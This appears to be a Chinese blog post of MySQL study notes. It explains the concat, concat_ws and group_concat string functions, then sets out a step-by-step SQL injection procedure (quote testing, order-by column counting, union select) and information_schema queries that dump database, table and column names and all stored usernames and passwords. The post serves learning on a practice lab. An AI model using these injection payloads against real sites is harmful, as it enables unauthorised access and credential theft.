mysql学习(二)

最新推荐文章于 2024-03-06 21:16:26 发布
最新推荐文章于 2024-03-06 21:16:26 发布
阅读量86 收藏
点赞数
分类专栏: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiongshivigor/article/details/119342785
版权

mysql学习笔记(二)

一.concat、concat_ws、group _concat函数

concat函数

1、功能:将多个字符串连接成一个字符串。

2、语法:concat(str1, str2,…)

返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null
在这里插入图片描述select concat(name,sex) as info from pet
在这里插入图片描述

concat_ws函数

1、功能:和concat()一样,将多个字符串连接成一个字符串,但是可以一次性指定分隔符~(concat_ws就是concat with separator)

2、语法:concat_ws(separator, str1, str2, …)

说明:第一个参数指定分隔符。需要注意的是分隔符不能为null,如果为null,则返回结果为null。
select concat_ws(’,’,name,sex) as info from pet
在这里插入图片描述

group_concat()函数

1、功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

2、语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )

说明:通过使用distinct可以排除重复值;如果希望对结果中的值进行排序,可以使用order by子句;separator是一个字符串值,缺省为一个逗号。
select owner,group_concat(name) from pet group by owner
在这里插入图片描述

二.sql注入一般步骤

1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。
2.接着尝试在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入。
3.输入–+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入
4.接着使用order by 语句判断,该表中一共有几列数据。
order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。
5.将id=1改为一个数据库不存在的id值,如861,使用union select 1,2,3联合查询语句查看页面是否有显示位。
6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息

★判断是否是数据查询->判断能否sql字符注入->判断字符注入类型(单双引号等)->爆列数->测试显示位->爆相关信息

三.爆数据库名称、表明、列明、字段信息的语句

爆数据库名

select group_concat(schema_name) from information_schema.schemata
在这里插入图片描述

查询security内的所有表名

select group_concat(table_name) from information_schema.tables where table_schema=‘security’
在这里插入图片描述

爆破出列名

select group_concat(column_name) from information_schema.columns where table_name=‘users’
在这里插入图片描述

查看所有用户名

select group_concat(username) from users
在这里插入图片描述

查看所有密码

select group_concat(password)from security.users
在这里插入图片描述
参考博客链接: link.

xiangzikou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
group_concat用法详解
Climbman的博客
04-05 588
group_concat函数常用于select 语句中,下面我们通过一张表来讲解group_concat函数的用法。
MySQLGROUP_CONCAT 函数详解
读万卷书,行万里路
11-15 1495
GROUP_CONCAT(expr) 函数会从 expr 中连接所有非 NULL 的字符串。如果没有非 NULL 的字符串,那么它就会返回 NULL。语法如下:它在递归查询中用的比较多,但要使用好它并不容易。所以让我们一起来看看吧:假设有这样一张领接表模型的树型表 t_region,它的基本结构如下: 字段 类型 大小 说明 REGION_ID int 11 行政地区I
mysql 多个字段拼接去重(GROUP_CONCAT)
zhuchunyan_aijia的博客
10-26 4270
在上述示例中,我们可以看到,使用GROUP_CONCAT或者CONCAT_WS函数可以将多个字段进行拼接,但是它们并不能去除重复的拼接结果。如果我们需要去除重复的拼接结果,可以使用子查询和DISTINCT关键字来实现。除了GROUP_CONCAT函数,MySQL还提供了CONCAT_WS函数,它可以将多个字段的值进行拼接,并使用指定的分隔符进行分隔。多个字段拼接去重是指将多个字段的值按照一定的规则进行拼接,并去除重复的拼接结果。MySQL提供了GROUP_CONCAT函数,可以用来将一列的值进行拼接。
SQL函数group_concat()--拼接同字段
Xiaoshutiaoi的博客
07-14 1491
SQL函数group_concat() 用法记录
MySQL学习入门01
06-08
关系型数据库是其中的一种类型,如MySQL,它以维表格的形式存储数据,描述了不同元素之间的关系。例如,在学生信息管理系统中,学生表、课程表和成绩表就是典型的维表,通过学号这一共同字段关联起来。 MySQL由...
MySQL学习基础
12-14
MySQL数据库学习   一.为什么要学习数据库 .数据库的相关概念 DBMS:数据库管理系统(datebase Management System),数据库是通过DBMS创建和操作的内容; DB :数据库(datebase):存储数据的仓库,他保存了一...
MySQL学习笔记 MySQL学习笔记
09-28
MySQL是世界上最受欢迎的关系型数据库管理系统之一,尤其在Web应用...学习MySQL不仅涉及理论知识,还需要大量的实践操作来熟悉其语法和功能。掌握MySQL能让你在数据管理、Web开发和系统集成等领域具备更强的竞争力。
MySQL5.7学习笔记.pdf
09-07
MySQL 5.7学习笔记 数据库概述: 数据库(Database)是一种存储数据的“仓库”,其本质是一个文件系统,保存了一系列有组织的数据。数据库管理系统(Database Management System)是一种操纵和管理数据库的大型...
MySQL学习书籍
11-22
以下是对"MySQL学习书籍InnoDB引擎"主题的深入探讨。 一、InnoDB存储引擎基础 InnoDB是MySQL的默认存储引擎,它支持ACID(原子性、一致性、隔离性和持久性)事务,这是许多企业级应用所必需的特性。InnoDB使用聚集...
SQL的group_concat函数——MYSQL将多行字符串组合到一行
weixin_50853979的博客
05-16 4876
目录 1.group_concat函数的语法及其用法 (1)语法: group_concat([DISTINCT] concat_name[Order BY rank_name>ASC/DESC ] [Separator Sep]) (2)用法:按某种分组方式/不分组将多行字符串合并在一行。 3.实例 1.group_concat函数的语法及其用法 (1)语法: group_concat([DISTINCT] <concat_name> [Order BY ran.
group_concat函数
热门推荐
lg1873868的博客
05-04 3万+
一、group_concat函数的功能   将group by产生的同一个分组中的值连接起来,返回一个字符串结果。   group_concat函数首先根据group by指定的列进行分组,将同一组的列显示出来,并且用分隔符分隔。由函数参数(字段名)决定要返回的列如: select group_concat(emp_name) from emp; +----------------------------------------------------------------------------
Mysql案例之GROUP_CONCAT函数详解
最新发布
累计发表博客60余万字,CSDN 博客专家、Java 领域优质创作者、华为云享专家、阿里云专家博主。专注分享 Java 优质文章,毕设实战项目开发,全网粉丝10W+
03-06 1862
首先以student表为主表,因为学生可能存在没有选课的情况,所以在关联表可能会存在没有关联数据的情况,但是这个时候学生数据也是应该要查询出来的,所以这个时候就需要使用左连接的方式进行连表查询,这样即使学生没有选课,仍然可以将学生的数据查询出来。对于这种情况,我们一般想到的是先根据学生表和关联表,找到每一个学生关联的所有学科,然后对每一个学生的学科进行排序,取到排列在第一位的学科,之后再根据第一次排序得到的学科名对学生进行排序,上面这种逻辑固然能够解决问题,但是使用不够简洁。我是灰小猿,我们下期见!
MySQL函数:行转列CONCATCONCAT_WS、GROUP_CONCAT的使用(精要)
血煞长虹 的专栏
12-10 1万+
MySql实际开发中,或多或少的会有一些行转列需求,CONCATCONCAT_WS、GROUP_CONCAT三个函数,首当其冲,本文带你详细了解它们的使用,赶快进来了解一下吧……
mysqlGROUP_CONCAT函数,以及查询表字段语句,以及存储过程调试(在group_concat中可以进行排序操作!!)
weixin_61503139的博客
07-19 950
查询该表的所有列用于拼接SQL。
解决mysql select  group_concat函数返回字符串长度问题
qq_42087460的博客
08-18 685
最近项目中碰到一个问题,就是调用mysql函数的时候,数据老是显示少了的问题 我 mysql 函数里面用的是 selectgroup_concat 返回的一个字符串 最终检查发现,mysqlgroup_concat函数,默认最大返回长度是1024 然后我数据长度超过了1024,导致数据被截取了 基本语法:group_concat([DISTINCT] 要连接的字段 [Order BY排序字段ASC/DESC] [Separator '分隔符']) 解决方法 show varia...
mysql 使用group_concat获取select * 所有字段列名拼接
fujw_2015的博客
10-29 813
在使用数据库查询时,很多时候为了省事会使用select * from table ...方式处理,后续如果需要将* 号改成具体的列明时,对于字段特别多的表,如果通过手动一个一个写的话效率会比较低,可以使用group_concat内置函数进行逗号拼接获取*号对应的所有字段列名,如下所示: 查看表字段列: desc order_info; 获取拼接字段列: -- 默认逗号分隔,其中table_schema为数据库名,table_name为表名 select group_concat(COLUMN
MySQLGROUP_CONCAT函数的使用,separator,将多行查询结果用特定字符串连接起来,适用于一对多
不忘初心,继续前进
02-08 2万+
GROUP_CONCAT  separator可将查询结果用字符串连接变为一行,需配合使用GROUP BY 举例:查询打分.打分是两个评委给的分数,每个人的成绩是有两个,但希望查出来的结果是用字符串连接的,变为一行数据   SELECT USERID, SCORE FROM TBL...
mysql SELECT GROUP_CONCAT一点使用心得
goodbook
02-26 1971
-- 可以精确查询GROUP_CONCAT后的汇总字段=1的数据 select * from ( select GROUP_CONCAT(DISTINCT status) status_group from account ) a where a.status_group = '1' -- 可以查询GROUP_CONCAT后的汇总字段包含1的数据 select * from ( select ...
mysql学习手册 第
01-07
Mysql学习手册 第版》是一本非常重要的数据库技术书籍,它详细介绍了Mysql数据库的相关知识和技术。这本书包含了Mysql数据库的基础知识,例如数据库的安装、配置和管理,以及高级内容,比如性能优化、备份恢复和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值